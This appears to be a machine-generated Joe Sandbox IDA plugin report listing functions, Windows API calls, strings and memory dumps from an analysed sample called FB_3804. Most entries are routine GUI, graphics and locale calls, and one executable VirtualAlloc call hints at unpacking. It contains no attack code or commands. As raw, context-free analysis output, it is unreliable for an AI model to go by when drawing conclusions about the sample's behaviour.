Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0041C830, Relevance: 1.3, APIs: 1, Instructions: 52

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C84E

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 004013C8, Relevance: 1.3, APIs: 1, Instructions: 34

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,004645F4,0040142B,?,?,004014CB,?,?,?,00000000,00004003,00401A0B), ref: 004013DB

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 002F3AAE, Relevance: 1.3, APIs: 1, Instructions: 12

APIs

CloseHandle.KERNEL32 ref: 002F3AB2

Memory Dump Source

Source File: 00000006.00000002.247520258.002F0000.00000040.sdmp, Offset: 002F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f0000_FB_3804.jbxd

Non-executed Functions

Function 0040598C, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004059A9
GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059BA
lstrcpyn.KERNEL32(?,?,?,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059EA
lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405A4E

Part of subcall function 00405978: CharNextA.USER32(?), ref: 0040597B

lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001), ref: 00405A83
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49), ref: 00405A96
FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000), ref: 00405AA3
lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC), ref: 00405AAF
lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405AE3
lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405AEF
lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405B11

Strings

GetLongPathNameA, xrefs: 004059B4
\, xrefs: 00405AC1
kernel32.dll, xrefs: 004059A4

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 00453090, Relevance: 18.4, APIs: 12, Instructions: 407

APIs

Part of subcall function 00457668: IsChild.USER32(00000000,00000000), ref: 004576C6

SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00453411
ShowWindow.USER32(00000000,00000003), ref: 00453421
ShowWindow.USER32(00000000,00000002), ref: 00453443
CallWindowProcA.USER32(00406BD0,00000000,00000005,00000000,?), ref: 0045346C
SendMessageA.USER32(?,00000234,00000000,00000000), ref: 00453491
ShowWindow.USER32(00000000,?), ref: 004534B6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000097), ref: 0045354F
GetActiveWindow.USER32 ref: 00453562
IsIconic.USER32(00000000), ref: 00453574

Part of subcall function 0044DEDC: GetCurrentThreadId.KERNEL32(Function_0004DE78,00000000,0045358A,00000000,00000000,004535DD), ref: 0044DEF6
Part of subcall function 0044DEDC: EnumThreadWindows.USER32(00000000,Function_0004DE78,00000000), ref: 0044DEFC

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004535A8
SetActiveWindow.USER32(00000000), ref: 004535AE
ShowWindow.USER32(00000000,00000000), ref: 004535C0

Part of subcall function 00406420: LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 0043D99C, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64

APIs

IsIconic.USER32(?), ref: 0043D9AB
GetWindowPlacement.USER32(?,0000002C), ref: 0043D9C8
GetWindowRect.USER32(?), ref: 0043D9E1
GetWindowLongA.USER32(?,000000F0), ref: 0043D9EF
GetWindowLongA.USER32(?,000000F8), ref: 0043DA04
ScreenToClient.USER32(00000000), ref: 0043DA11
ScreenToClient.USER32(00000000,?), ref: 0043DA1C

Strings

,, xrefs: 0043D9B4

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 00456740, Relevance: 9.1, APIs: 6, Instructions: 86

APIs

IsIconic.USER32(?), ref: 00456748
SetActiveWindow.USER32(?), ref: 00456759
IsWindowEnabled.USER32(00000000), ref: 0045677C
DefWindowProcA.USER32(?,00000112,0000F120,00000000), ref: 00456795

Part of subcall function 00455738: ShowWindow.USER32(00000000,00000006), ref: 00455753

SetWindowPos.USER32(?,00000000,00000000,?,?,0045618A,00000000), ref: 004567DB
SetFocus.USER32(00000000), ref: 00456820

Part of subcall function 004514F0: ShowWindow.USER32(00000000,?), ref: 00451527

Part of subcall function 00455DB4: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 00455E07

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 0043D0B8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81

APIs

IsIconic.USER32(?), ref: 0043D0F7
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043D115
GetWindowPlacement.USER32(?,0000002C), ref: 0043D14B
SetWindowPlacement.USER32(?,0000002C), ref: 0043D16F

Strings

,, xrefs: 0043D139

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 00456690, Relevance: 7.6, APIs: 5, Instructions: 59

APIs

IsIconic.USER32(00000000), ref: 00456698
SetActiveWindow.USER32(00000000), ref: 004566B0
IsWindowEnabled.USER32(00000000), ref: 004566D3
SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040), ref: 004566FC
DefWindowProcA.USER32(00000000,00000112,0000F020,00000000), ref: 00456711

Part of subcall function 00455738: ShowWindow.USER32(00000000,00000006), ref: 00455753

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 0042658C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46

APIs

IsIconic.USER32(?), ref: 004265D5
GetWindowPlacement.USER32(?,?), ref: 004265E3
GetWindowRect.USER32(?,?), ref: 004265EF

Part of subcall function 004264FC: GetSystemMetrics.USER32(00000000), ref: 0042654D
Part of subcall function 004264FC: GetSystemMetrics.USER32(00000001), ref: 00426559

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

MonitorFromWindow, xrefs: 004265A3

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 004087A4, Relevance: 6.0, APIs: 4, Instructions: 37

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004087BF
FindClose.KERNEL32(00000000,00000000,?), ref: 004087CA
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004087E3
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 004087F4

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 0043C810, Relevance: 3.1, APIs: 2, Instructions: 63

APIs

IsIconic.USER32(?), ref: 0043C848
GetCapture.USER32(?), ref: 0043C851

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 0040AA6C, Relevance: 3.0, APIs: 2, Instructions: 37

APIs

GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040AAD0), ref: 0040AA92
GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040AAD0), ref: 0040AAAB

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 0040976C, Relevance: 1.5, APIs: 1, Instructions: 29

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040978A

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 004097B8, Relevance: 1.5, APIs: 1, Instructions: 23

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040AD7E,00000000,0040AF97,?,?,00000000,00000000), ref: 004097CB

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 00441F3C, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95

APIs

SetErrorMode.KERNEL32(00008000), ref: 00441F55
GetModuleHandleA.KERNEL32(USER32,00000000,004420A2,?,00008000), ref: 00441F79
GetProcAddress.KERNEL32(00000000,WINNLSEnableIME,USER32,00000000,004420A2,?,00008000), ref: 00441F86
LoadLibraryA.KERNEL32(IMM32.DLL), ref: 00441FA2
GetProcAddress.KERNEL32(00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FC4
GetProcAddress.KERNEL32(00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FD9
GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00441FEE
GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442003
GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2,?,00008000), ref: 00442018
GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000,004420A2), ref: 0044202D
GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext,IMM32.DLL,00000000), ref: 00442042
GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext,00000000,ImmGetContext), ref: 00442057
GetProcAddress.KERNEL32(00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus,00000000,ImmReleaseContext), ref: 0044206C
GetProcAddress.KERNEL32(00000000,ImmNotifyIME,00000000,ImmIsIME,00000000,ImmGetCompositionStringA,00000000,ImmSetCompositionFontA,00000000,ImmSetCompositionWindow,00000000,ImmSetOpenStatus,00000000,ImmSetConversionStatus,00000000,ImmGetConversionStatus), ref: 00442081
SetErrorMode.KERNEL32(?,004420A9,00008000), ref: 0044209C

Strings

USER32, xrefs: 00441F74
ImmSetConversionStatus, xrefs: 00441FF8
ImmSetCompositionFontA, xrefs: 00442037
WINNLSEnableIME, xrefs: 00441F80
ImmNotifyIME, xrefs: 00442076
IMM32.DLL, xrefs: 00441F9D
ImmGetContext, xrefs: 00441FB9
ImmSetCompositionWindow, xrefs: 00442022
ImmGetConversionStatus, xrefs: 00441FE3
ImmGetCompositionStringA, xrefs: 0044204C
ImmSetOpenStatus, xrefs: 0044200D
ImmIsIME, xrefs: 00442061
ImmReleaseContext, xrefs: 00441FCE

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 00427C9C, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 98

APIs

GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00427CA3
GetProcAddress.KERNEL32(00000000,InitializeFlatSB,comctl32.dll), ref: 00427CB8
GetProcAddress.KERNEL32(00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CC8
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CD8
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CE8
GetProcAddress.KERNEL32(00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427CF8
GetProcAddress.KERNEL32(00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427D19
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB,comctl32.dll), ref: 00427D3A
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB,00000000,InitializeFlatSB), ref: 00427D5B
GetProcAddress.KERNEL32(00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp,00000000,UninitializeFlatSB), ref: 00427D7C
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollPos,00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp,00000000,FlatSB_GetScrollProp), ref: 00427D9D
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollInfo,00000000,FlatSB_SetScrollPos,00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar,00000000,FlatSB_SetScrollProp), ref: 00427DBE
GetProcAddress.KERNEL32(00000000,FlatSB_SetScrollRange,00000000,FlatSB_SetScrollInfo,00000000,FlatSB_SetScrollPos,00000000,FlatSB_GetScrollPos,00000000,FlatSB_GetScrollInfo,00000000,FlatSB_GetScrollRange,00000000,FlatSB_ShowScrollBar,00000000,FlatSB_EnableScrollBar), ref: 00427DDF

Strings

FlatSB_ShowScrollBar, xrefs: 00427D13
comctl32.dll, xrefs: 00427C9E
FlatSB_SetScrollProp, xrefs: 00427CE2
FlatSB_EnableScrollBar, xrefs: 00427CF2
FlatSB_GetScrollInfo, xrefs: 00427D55
FlatSB_GetScrollPos, xrefs: 00427D76
InitializeFlatSB, xrefs: 00427CB2
UninitializeFlatSB, xrefs: 00427CC2
FlatSB_GetScrollRange, xrefs: 00427D34
FlatSB_SetScrollPos, xrefs: 00427D97
FlatSB_GetScrollProp, xrefs: 00427CD2
FlatSB_SetScrollRange, xrefs: 00427DD9
FlatSB_SetScrollInfo, xrefs: 00427DB8

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0041FFE4, Relevance: 37.7, APIs: 25, Instructions: 248

APIs

CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 00420027
SelectObject.GDI32(?,?), ref: 0042003C
MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0042008B
SelectObject.GDI32(?,?), ref: 004200A5
DeleteObject.GDI32(?), ref: 004200B1
CreateCompatibleDC.GDI32(00000000), ref: 004200C5
CreateCompatibleBitmap.GDI32(?,?,?), ref: 004200E6
SelectObject.GDI32(?,?), ref: 004200FB
SelectPalette.GDI32(?,02080848,00000000), ref: 0042010F
SelectPalette.GDI32(?,?,00000000), ref: 00420121
SelectPalette.GDI32(?,00000000,000000FF), ref: 00420136
SelectPalette.GDI32(?,02080848,000000FF), ref: 0042014C
RealizePalette.GDI32(?), ref: 00420158
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042017A
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0042019C
SetTextColor.GDI32(?,00000000), ref: 004201A4
SetBkColor.GDI32(?,00FFFFFF), ref: 004201B2
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004201DE
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420203
SetTextColor.GDI32(?,?), ref: 0042020D
SetBkColor.GDI32(?,?), ref: 00420217
SelectObject.GDI32(?,00000000), ref: 0042022A
DeleteObject.GDI32(?), ref: 00420233
SelectPalette.GDI32(?,00000000,00000000), ref: 00420255
DeleteDC.GDI32(?), ref: 0042025E

Memory Dump Source

Source File: 00000006.00000001.189993630.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000001.189984132.00400000.00000002.sdmp
Associated: 00000006.00000001.190004797.0045C000.00000004.sdmp
Associated: 00000006.00000001.190010838.0045D000.00000008.sdmp
Associated: 00000006.00000001.190017653.00464000.00000004.sdmp
Associated: 00000006.00000001.190025237.00466000.00000008.sdmp
Associated: 00000006.00000001.190031941.00468000.00000004.sdmp
Associated: 00000006.00000001.190038607.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_1_400000_FB_3804.jbxd

Function 0042398C, Relevance: 31.7, APIs: 21, Instructions: 194

APIs

GetObjectA.GDI32(?,00000054,?), ref: 004239AF
GetDC.USER32(00000000), ref: 004239DD
CreateCompatibleDC.GDI32(?), ref: 004239EE
CreateBitmap.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,00423B87,?,?,00000054,?), ref: 00423A09
SelectObject.GDI32(?,00000000), ref: 00423A23
PatBlt.GDI32(?,00000000,00000000,?,?,00000042,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000), ref: 00423A45
CreateCompatibleDC.GDI32(?), ref: 00423A53
DeleteDC.GDI32(?), ref: 00423B39

Part of subcall function 004232C4: GetObjectA.GDI32(00000000,00000054,?), ref: 00423344
Part of subcall function 004232C4: GetDC.USER32(00000000), ref: 00423355
Part of subcall function 004232C4: CreateCompatibleDC.GDI32(00000000), ref: 00423366
Part of subcall function 004232C4: CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000,00000000,00423912,?,00000000,00000000), ref: 004233B2
Part of subcall function 004232C4: CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 004233D6
Part of subcall function 004232C4: GetDeviceCaps.GDI32(00000028,0000000C), ref: 00423426
Part of subcall function 004232C4: GetDeviceCaps.GDI32(00000028,0000000E), ref: 00423433
Part of subcall function 004232C4: SelectObject.GDI32(?,00000000), ref: 004234DD
Part of subcall function 004232C4: GetDIBColorTable.GDI32(?,00000000,00000100,-00000027), ref: 00423503
Part of subcall function 004232C4: GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000001,00000000), ref: 0042352E
Part of subcall function 004232C4: SelectObject.GDI32(?,?), ref: 0042353B
Part of subcall function 004232C4: CreateDIBSection.GDI32(00000028,00000001,00000000,00000003,00000000,00000000), ref: 00423591
Part of subcall function 004232C4: GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000001,00000000), ref: 004235F2
Part of subcall function 004232C4: SelectObject.GDI32(?,?), ref: 00423633
Part of subcall function 004232C4: SelectPalette.GDI32(?,00000000,00000000), ref: 00423673
Part of subcall function 004232C4: RealizePalette.GDI32(?), ref: 0042367F
Part of subcall function 004232C4: FillRect.USER32(?,?,00000000), ref: 004236D0
Part of subcall function 004232C4: SetTextColor.GDI32(?,00000000), ref: 004236E8
Part of subcall function 004232C4: SetBkColor.GDI32(?,00000000), ref: 00423702
